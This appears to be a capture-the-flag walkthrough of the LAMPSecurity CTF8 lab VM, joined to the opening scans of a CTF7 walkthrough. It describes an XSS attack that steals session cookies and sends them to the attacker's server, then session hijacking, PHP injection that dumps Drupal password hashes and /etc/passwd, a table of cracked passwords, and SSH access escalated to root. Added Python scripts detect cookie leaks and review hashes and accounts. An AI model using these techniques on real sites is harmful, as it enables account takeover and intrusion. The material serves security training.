Source Information

Author: madirish2600
Series: LAMPSecurity
Download: download.vulnhub.com/lampsecurity/ctf8.zip

“The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available here.”


Getting Started

“The secret of getting ahead is getting started.” –Mark Twain

To start us off, let’s use arp-scan to ARP out across our local network and identify that the CTF8 box has leased the IP address 10.0.88.10.

calvinbebop@Dolos:~$ arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.88.1	52:54:00:12:35:00	QEMU
10.0.88.3	08:00:27:99:07:fb	Cadmus Computer Systems
10.0.88.2	52:54:00:12:35:00	QEMU
10.0.88.10	08:00:27:a5:48:e4	Cadmus Computer Systems

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.530 seconds (101.19 hosts/sec). 4 responded

Initial Service Enumeration

Next up, we’ll use Nmap to initiate a full TCP SYN scan of the CTF8 box (10.0.88.10) and search for some potential attack vectors in the system. A complete description of the tool’s flag usage can be found here. We’ll start by using the following flags:

Flag  Description
-sS   Utilize a TCP SYN scan
-sV   Probe open ports to determine service/version info
-sC   Run the default set of service scripts
-A    Enable OS detection, version detection, script scanning, and traceroute
-p-   Target all TCP ports from 1-65535

calvinbebop@Dolos:~$ sudo nmap -sS -sV -sC -A -p- 10.0.88.10
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-22 15:05 CST
Nmap scan report for 10.0.88.10
Host is up (0.00065s latency).
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Jun 05  2013 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.0.88.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 2.0.5 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 5e:ca:64:f0:7f:d2:1a:a2:86:c6:1f:c2:2a:b3:6b:27 (DSA)
|_  2048 a3:39:2d:9f:66:96:0d:82:ad:52:1f:a1:dc:b1:f1:54 (RSA)
25/tcp   open  smtp        Sendmail
| smtp-commands: localhost.localdomain Hello [10.0.88.5], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp   open  http        Apache httpd 2.2.3 ((CentOS))
|_http-favicon: Drupal CMS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /sites/ /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /install.php /INSTALL.txt /LICENSE.txt 
|_/MAINTAINERS.txt
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: LAMPSecurity Research
443/tcp  open  ssl/https?
|_ssl-date: 2018-12-22T21:05:36+00:00; 0s from scanner time.
445/tcp  open  netbios-ssn Samba smbd 3.0.33-3.7.el5 (workgroup: WORKGROUP)
920/tcp  open  status      1 (RPC #100024)
3306/tcp open  mysql       MySQL (unauthorized)
5801/tcp open  vnc-http    RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5901)
|_http-server-header: RealVNC/4.0
|_http-title: VNC viewer for Java
5901/tcp open  vnc         VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|_    VNC Authentication (2)
MAC Address: 08:00:27:A5:48:E4 (Oracle VirtualBox virtual NIC)
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Service Info: OS: Unix

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m14s, median: 0s
|_nbstat: NetBIOS name: LAMPSEC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.33-3.7.el5)
|   Computer name: localhost
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: localhost.localdomain
|_  System time: 2018-12-22T16:05:39-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

FTP (21/TCP) Anonymous Access | Flag #1

One of the first things we may notice from the results of our Nmap scan is that not only is there an FTP service available, it also allows for an anonymous user login.

21/tcp   open  ftp         vsftpd 2.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Jun 05  2013 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.0.88.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 2.0.5 - secure, fast, stable
|_End of status

Using FileZilla to log in as the anonymous user, we are able to pull down our first flag!

#flag#5eb798d41d2e53295d34005f49113fc0

Unfortunately, it does not look like we’re able to use the anonymous user for uploads though.

Status:	Logged in
Status:	Starting upload of /var/www/html/reverseme.php
Command:	CWD /pub
Response:	250 Directory successfully changed.
Command:	TYPE A
Response:	200 Switching to ASCII mode.
Command:	PASV
Response:	227 Entering Passive Mode (10,0,88,10,39,103)
Command:	STOR reverseme.php
Response:	550 Permission denied.
Error:	Critical file transfer error

HTTP (80/TCP) Enumeration (Scanning)

Let’s go ahead and kick off a nikto scan of the web server in the background while we conduct a manual investigation of the site. Nikto gives us a plethora of useful information; however, we’ll focus on the manual investigation for now.

calvinbebop@Dolos:~$ nikto -h http://10.0.88.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.88.10
+ Target Hostname:    10.0.88.10
+ Target Port:        80
+ Start Time:         2018-12-22 16:15:42 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Retrieved x-powered-by header: PHP/5.1.6
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3268: /misc/: Directory indexing found.
+ OSVDB-3268: /modules/: Directory indexing found.
+ OSVDB-3268: /profiles/: Directory indexing found.
+ OSVDB-3268: /sites/: Directory indexing found.
+ OSVDB-3268: /themes/: Directory indexing found.
+ "robots.txt" contains 36 entries which should be manually viewed.
+ OSVDB-39272: favicon.ico file identifies this server as: Drupal 5.1.0
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.
+ OSVDB-4806: /support/messages: Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /marketing/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /sales/: This might be interesting...
+ OSVDB-3092: /support/: This might be interesting...
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMail found
+ OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.
+ OSVDB-3092: /scripts/showuser.cgi: Shows the output of the 'whoami' command, which shows the web server user.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /webmail/src/configtest.php: Squirrelmail configuration test may reveal version and system info.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ OSVDB-81817: /?q[]=x: Drupal 7 contains a path information disclosure
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 9175 requests: 0 error(s) and 80 item(s) reported on remote host
+ End Time:           2018-12-22 16:28:09 (GMT-6) (747 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

HTTP (80/TCP) Enumeration (Manual) | Flag #2

Welcome to CTF8’s primary website, LAMPSecurity Research.


Checking in on the source of the home page, we’re able to find our second flag!

#flag#550e1bafe077ff0b0b67f4e32f29d751

Navigating into one of the blog entries from the home page, we are able to see that the site allows for comment inputs from guests of the site.


In the spirit of breaking things, let’s attempt a basic test to check for XSS (Cross Site Scripting) vulnerabilities within the commenting system.


Bingo!


XSS Exploitation - Session Hijacking Attack

We’ll now attempt to use the XSS vulnerability we discovered to launch a session hijacking attack against the other users of the site. First, we’ll need to set up an HTTP server on our local (attacker) machine to receive the incoming stolen session IDs/cookies.

calvinbebop@Dolos:~$ service apache2 start
calvinbebop@Dolos:~$ service apache2 status
 apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: active (running) since Sat 2018-12-22 17:27:06 CST; 34s ago
  Process: 28104 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
 Main PID: 28108 (apache2)
    Tasks: 7 (limit: 4915)
   Memory: 14.1M
   CGroup: /system.slice/apache2.service
           ├─28108 /usr/sbin/apache2 -k start
           ├─28109 /usr/sbin/apache2 -k start
           ├─28110 /usr/sbin/apache2 -k start
           ├─28111 /usr/sbin/apache2 -k start
           ├─28112 /usr/sbin/apache2 -k start
           ├─28113 /usr/sbin/apache2 -k start
           └─28114 /usr/sbin/apache2 -k start


We then submit a comment to the post with the following JavaScript code snippet. When the victim’s browser executes this code, it sends an HTTP GET request to our attacker machine that includes the victim’s stolen session ID/cookie.


We can also see that this post was submitted by a user Barbara.


Using the site’s user contact page, we can send Barbara a link to the article to simulate a targeted attack.


After a few minutes, we can see our first batch of stolen cookies come in!

calvinbebop@Dolos:/var/log/apache2# sudo cat * | grep 22/Dec | grep -v "127.0.0.1" | grep -v "10.0.88.5"
10.0.88.10 - - [22/Dec/2018:18:12:02 -0600] "GET /SESSfc1bd34caa7d99af80db03d749397e53=j94qillr0ho22u8tafhq0bdvh4 HTTP/1.1" 404 553 "http://10.0.88.13/content/lampsec-point-security-available" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"
10.0.88.10 - - [22/Dec/2018:18:12:07 -0600] "GET /SESSfc1bd34caa7d99af80db03d749397e53=1d6o64k3ri88fogkku75vao8v6;%20has_js=1 HTTP/1.1" 404 563 "http://10.0.88.13/content/lampsec-point-security-available" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"
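
What the log above actually records is a session cookie travelling inside a request URL, which is the tell to hunt for wherever such requests get logged (the receiving server, or an outbound proxy). As an added example that is not code from the original post, the following script flags that pattern over constructed log lines in the same Apache combined format, and audits a Set-Cookie header for the HttpOnly flag that would have kept document.cookie out of the injected script’s reach.

```python
"""Detect session cookies leaking into request URLs, and audit cookie flags.

Added example, not from the original post.  The log lines below are
constructed to match the Apache combined-log format shown in the walkthrough;
the Drupal cookie name SESS<md5> and the PHPSESSID name are the real formats,
everything else is sample data.
"""
import re
from urllib.parse import unquote

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_LOG = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Cookie names that must never show up in a URL.  Drupal 5/6 names its session
# cookie SESS + md5(site base URL); PHPSESSID is PHP's default session cookie.
SESSION_COOKIE = re.compile(
    r'(?P<name>SESS[0-9a-f]{32}|PHPSESSID)=(?P<value>[0-9a-z]+)', re.I)


def parse_line(line):
    """Return the combined-log fields of one line, or None if it does not parse."""
    m = COMBINED_LOG.match(line.strip())
    return m.groupdict() if m else None


def find_cookie_leaks(lines):
    """One finding per request whose URL carries a session cookie.

    The whole cookie jar arrives URL-encoded (e.g. ';%20has_js=1'), so the path
    is decoded before matching.  The receiving server usually answers 404 for
    the made-up path, which is a second, cheap signal.
    """
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        m = SESSION_COOKIE.search(unquote(rec['path']))
        if not m:
            continue
        findings.append({
            'client': rec['client'],
            'time': rec['time'],
            'cookie': m.group('name'),
            'session_id': m.group('value'),
            'referer': rec['referer'],   # the page that hosted the injected script
            'status': int(rec['status']),
        })
    return findings


def audit_set_cookie(header_value):
    """Report hardening attributes missing from a Set-Cookie header value.

    HttpOnly hides the cookie from document.cookie, so the injected script would
    have had nothing to send; Secure keeps it off plain HTTP.  nmap's
    http-cookie-flags script performs the same check.
    """
    parts = [p.strip() for p in header_value.split(';')]
    name = parts[0].split('=', 1)[0]
    attrs = {p.split('=', 1)[0].lower() for p in parts[1:]}
    missing = [flag for flag in ('HttpOnly', 'Secure') if flag.lower() not in attrs]
    return {'cookie': name, 'missing': missing}


# Constructed sample: two exfil hits shaped like the ones in the post plus one
# ordinary page request that must not be flagged.
SAMPLE_LOG = [
    '10.0.88.10 - - [22/Dec/2018:18:12:02 -0600] "GET /SESSfc1bd34caa7d99af80db03d749397e53=j94qillr0ho22u8tafhq0bdvh4 HTTP/1.1" 404 553 "http://10.0.88.13/content/lampsec-point-security-available" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"',
    '10.0.88.10 - - [22/Dec/2018:18:12:07 -0600] "GET /SESSfc1bd34caa7d99af80db03d749397e53=1d6o64k3ri88fogkku75vao8v6;%20has_js=1 HTTP/1.1" 404 563 "http://10.0.88.13/content/lampsec-point-security-available" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"',
    '10.0.88.5 - - [22/Dec/2018:18:13:40 -0600] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for f in find_cookie_leaks(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} leaked {f['cookie']} "
              f"from {f['referer']} (status {f['status']})")
    print(audit_set_cookie('PHPSESSID=407rm89j7cj9js4c3i9ma6s600; path=/'))
```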


Using a cookie modification add-on for Firefox, we’re able to change our session ID value to the stolen value, 1d6o64k3ri88fogkku75vao8v6. This can also be accomplished using a proxy tool such as Burp.


And just like that, we’ve successfully hijacked Barbara’s session!


Exposing the Drupal Database

After hijacking Barbara’s web admin account, we now have the ability to create and post new content that includes PHP code. We’ll now attempt to create a post that contains PHP that will try to create a reverse webshell connection back to our attacker machine.


Unfortunately, it appears that the system account responsible for executing this code has rather limited privileges: attempts to use PHP either to connect out via a reverse webshell or to open a listening port on the victim machine both fail with a “failure to daemonise” error. However, if we look closely, we can identify that this server is running an instance of Drupal for its CMS.


Checking back on our initial web scans, we can see that Nikto already identified this as an interesting point of investigation.

+ OSVDB-3092: /install.php: Drupal install.php file found.


Drupal also allows for dynamic code execution in Blocks. Let’s create a new block that will attempt to execute some PHP code to dump the usernames and passwords of every account in the Drupal database!


Success!


Hash Identification/Cracking

Using Hash-identifier (or an equivalent online tool), we’re able to determine that these are MD5 hashed strings.

calvinbebop@Dolos:~$ hash-identifier 
   #########################################################################
   #	 __  __ 		    		__		 	 ______    _____	       #
   #	/\ \/\ \		   		   /\ \ 		/\__  _\  /\  _ `\	       #
   #	\ \ \_\ \     __      ____ \ \ \___		\/_/\ \/  \ \ \/\ \	       #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R 							   #
   #							www.Blackploit.com 						   #
   #						       Root@Blackploit.com  				   #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 25e4ee4e9229397b6b17776bfceaf8e7

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Luckily for us, MD5 hashes are relatively easy to crack and numerous online sources are happy to provide the “decrypted” strings for provided hashes.

Hash Result
25e4ee4e9229397b6b17776bfceaf8e7 adminpass
49265c16d1dff8acef3499bd889299d6 football123
bed128365216c019988915ed3add75fb passw0rd
2a5de0f53b1317f7e36afcdb6b5202a4 letmein!
08d15a4aef553492d8971cdd5198f314 drupal
c3319d1016a802db86653bcfab871f4f 1website
9b9e4bbd988954028a44710a50982576 superSun123
7d29975b78825ea7c27f5c0281ea2fa4 MonsterDrink
518462cd3292a67c755521c1fb50c909 4summer13
6dc523ebd2379d96cc0af32e2d224db0 1loveU
0d42223010b69cab86634bc359ed870b BobMarley
8f75ad3f04fc42f07c95e2f3d0ec3503 BaseballSeason
ed2b1f468c5f915f3f1cf75d7068baae 12341234
ca594f739e257245f2be69eb546c1c04 sitepass
85aca385eb555fb6a36a62915ddd8bc7 Seventy70
573152cc51de19df50e90b0e557db7fe swanson
c7a4476fc64b75ead800da9ea2b7d072 cherry
42248d4cb640a3fb5836571e254aee2b buddahbrother
971dcf53e88e9268714d9d504753d347 drupalpassword
3005d829eb819341357bfddf541c175b thundercats
7a1c07ff60f9c07ffe8da34ecbf4edc2 fantasy
7c6a180b36896a0a8c02787eeafb0e4c password1
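
As an added example (not part of the original post), here is the shape-based identification that hash-identifier performs, a re-hash check confirming these are bare, unsalted MD5 digests (which is why lookup sites answer instantly), and the salted, iterated alternative for contrast; the two hash/plaintext pairs are taken from the table above.

```python
"""Why the hashes above fell so easily: identification and a re-hash check.

Added example, not from the original post.  identify() mimics what
hash-identifier does (length and alphabet heuristics only; it cannot tell
plain MD5 from any other 128-bit digest).  verify_md5() shows that the Drupal
hashes are bare, unsalted MD5: hashing the recovered string once reproduces
the stored value, which is exactly what makes online lookup tables work.
"""
import hashlib
import hmac
import os

# Candidate algorithms by hex-digest length; hash-identifier works the same way.
LENGTH_HINTS = {
    32: ['MD5', 'MD4', 'NTLM', 'Domain Cached Credentials'],
    40: ['SHA-1', 'RIPEMD-160', 'MySQL 4.1+ (without leading *)'],
    64: ['SHA-256'],
    128: ['SHA-512'],
}


def identify(digest):
    """Return candidate algorithms for a digest string, most common first.

    This is a guess from shape alone: a 32-character hex string could be MD5,
    MD4 or NTLM.  Non-hex input (bcrypt, $1$..., base64) yields no candidates.
    """
    d = digest.strip()
    if not d or not all(c in '0123456789abcdefABCDEF' for c in d):
        return []
    return list(LENGTH_HINTS.get(len(d), []))


def verify_md5(stored, candidate):
    """True if md5(candidate) equals the stored hex digest (unsalted MD5)."""
    computed = hashlib.md5(candidate.encode()).hexdigest()
    return hmac.compare_digest(computed, stored.lower())


def check_table(table):
    """Re-hash every (hash, plaintext) pair and report which ones match."""
    return {h: verify_md5(h, p) for h, p in table}


# Two pairs taken from the post's table, used here as a constructed sample.
CRACKED = [
    ('7c6a180b36896a0a8c02787eeafb0e4c', 'password1'),
    ('bed128365216c019988915ed3add75fb', 'passw0rd'),
]


def salted_pbkdf2(password, salt=None, rounds=100_000):
    """Contrast case: per-user random salt plus a slow KDF.

    Two users who pick the same password get unrelated digests, so a
    precomputed table is useless, and each guess costs `rounds` iterations
    instead of a single MD5 block.  Output is 'salthex$derivedkeyhex'.
    """
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, rounds)
    return salt.hex() + '$' + dk.hex()


if __name__ == '__main__':
    print(identify('25e4ee4e9229397b6b17776bfceaf8e7'))
    print(check_table(CRACKED))
    print(salted_pbkdf2('password1'))
    print(salted_pbkdf2('password1'))   # differs from the line above: new salt
```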

Rooted - User Account Password Reuse

After attempting to log in to each account using the available first names and our new set of passwords, it looks like the server’s user accounts follow a different naming convention than just first names. A good way to get a list of configured usernames is to retrieve /etc/passwd, which may be possible by adding an include statement to our malicious PHP code block.


Aaaand success.


Excluding the account names that have no direct shell access (as shown by the /sbin/nologin shell), we have a pretty decent list of accounts to attempt to authenticate against. Working our way down the list with our newly acquired password list at the ready, we can pretty quickly find ourselves SSH’d into the server and escalating to root without hassle.

calvinbebop@Dolos:~# ssh spinkton@10.0.88.10
Welcome to LAMPSecurity Research SSH access!
#flag#5e937c51b852e1ee90d42ddb5ccb8997

Unauthorized access is expected...
spinkton@10.0.88.10's password: 
Last login: Thu Mar 27 12:48:29 2014 from 192.168.56.1
#flag#motd-flag
[spinkton@localhost ~]$ sudo su
Password: 
[root@localhost spinkton]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=user_u:system_r:unconfined_t
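
The filter applied by eye above, as an added example that is not from the original post: parse a /etc/passwd dump, keep the accounts with a usable login shell, and flag uid-0 aliases and service accounts that should not have a shell at all. The passwd lines are constructed sample data (only the spinkton name comes from the walkthrough).

```python
"""Review the accounts in a /etc/passwd dump.

Added example, not from the original post.  SAMPLE_PASSWD is constructed: the
'spinkton' name is from the walkthrough, every other entry is sample data.
"""

# Shells that cannot be used to log in interactively.
NON_LOGIN_SHELLS = {
    '/sbin/nologin', '/usr/sbin/nologin', '/bin/false',
    '/sbin/halt', '/sbin/shutdown', '/bin/sync',
}

# CentOS 5 starts regular (human) users at uid 500; newer distros use 1000.
FIRST_HUMAN_UID = 500


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; comments and malformed lines are skipped."""
    accounts = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        parts = line.split(':')
        if len(parts) != 7 or not parts[2].isdigit():
            continue
        name, _pw, uid, gid, gecos, home, shell = parts
        accounts.append({'name': name, 'uid': int(uid), 'gid': int(gid),
                         'gecos': gecos, 'home': home, 'shell': shell})
    return accounts


def interactive_accounts(text):
    """Accounts that can open a shell, i.e. the ones a reused password can land in."""
    return [a for a in parse_passwd(text) if a['shell'] not in NON_LOGIN_SHELLS]


def review_findings(text):
    """Summary a defender wants: who can log in, and which entries look wrong."""
    interactive = interactive_accounts(text)
    return {
        'interactive': [a['name'] for a in interactive],
        # any second uid-0 entry is root under another name
        'uid0_aliases': [a['name'] for a in parse_passwd(text)
                         if a['uid'] == 0 and a['name'] != 'root'],
        # system/service accounts that nonetheless have a login shell
        'service_with_shell': [a['name'] for a in interactive
                               if 0 < a['uid'] < FIRST_HUMAN_UID],
        'human_users': [a['name'] for a in interactive
                        if a['uid'] >= FIRST_HUMAN_UID],
    }


# Constructed sample passwd file.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
spinkton:x:500:500:Sample Pinkton:/home/spinkton:/bin/bash
jsample:x:501:501:Jane Sample:/home/jsample:/bin/bash
toor:x:0:0:second uid-0 entry:/root:/bin/bash
# a comment line, then a malformed entry that must be skipped
broken:x:nope
"""

if __name__ == '__main__':
    for key, names in review_findings(SAMPLE_PASSWD).items():
        print(f"{key}: {', '.join(names) or '-'}")
```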


EOL

Thank you for sticking around for this week’s boot2root. I think this box quite nicely illustrates how dangerous password reuse can really be!
As always, if you have any questions, corrections, or comments, please feel free to reach out to me on Twitter and have yourself an excellent day!


Source Information

Author: madirish2600
Series: LAMPSecurity
Download: download.vulnhub.com/lampsecurity/CTF7plusDocs.zip

“The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available here.”


Getting Started

“The way to get started is to quit talking and begin doing.” –Walt Disney

To get rolling, let’s use arp-scan to ARP out across our local network and identify that the CTF7 box has leased the IP address 10.0.88.9.

calvinbebop@Dolos:~$ ifconfig | grep inet
        inet 10.0.88.5  netmask 255.255.255.0  broadcast 10.0.88.255
        inet6 fe80::a00:27ff:feaa:650e  prefixlen 64  scopeid 0x20<link>
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
calvinbebop@Dolos:~$ arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.88.1	52:54:00:12:35:00	QEMU
10.0.88.2	52:54:00:12:35:00	QEMU
10.0.88.3	08:00:27:de:0a:10	CADMUS COMPUTER SYSTEMS
10.0.88.9	00:0c:29:9d:12:a9	VMware, Inc.

Initial Service Enumeration

We’ll now use Nmap to initiate a full TCP SYN scan of the CTF7 box (10.0.88.9) and search for some potential attack vectors in the system. A complete description of the tool’s flag usage can be found here. We’ll start by using the following flags:

Flag  Description
-sS   Utilize a TCP SYN scan
-sV   Probe open ports to determine service/version info
-sC   Run the default set of service scripts
-A    Enable OS detection, version detection, script scanning, and traceroute
-p-   Target all TCP ports from 1-65535

calvinbebop@Dolos:~$ sudo nmap -sS -sV -sC -A -p- 10.0.88.9
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-15 16:40 CST
Nmap scan report for 10.0.88.9
Host is up (0.00065s latency).
Not shown: 65526 filtered ports
PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 41:8a:0d:5d:59:60:45:c4:c4:15:f3:8a:8d:c0:99:19 (DSA)
|_  2048 66:fb:a3:b4:74:72:66:f4:92:73:8f:bf:61:ec:8b:35 (RSA)
80/tcp    open   http        Apache httpd 2.2.15 ((CentOS))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Mad Irish Hacking Academy
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.5.10-125.el6 (workgroup: MYGROUP)
901/tcp   open   http        Samba SWAT administration server
| http-auth: 
| HTTP/1.0 401 Authorization Required\x0D
|_  Basic realm=SWAT
|_http-title: 401 Authorization Required
5900/tcp  closed vnc
8080/tcp  open   http        Apache httpd 2.2.15 ((CentOS))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.2.15 (CentOS)
| http-title: Admin :: Mad Irish Hacking Academy
|_Requested resource was /login.php
10000/tcp open   http        MiniServ 1.610 (Webmin httpd)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: MiniServ/1.610
|_http-title: Login to Webmin
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.13
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 2h30m02s, deviation: 3h32m11s, median: 0s
| smb-os-discovery: 
|   OS: Unix (Samba 3.5.10-125.el6)
|   Computer name: localhost
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: localhost
|_  System time: 2018-12-15T17:43:32-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.65 ms 10.0.88.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
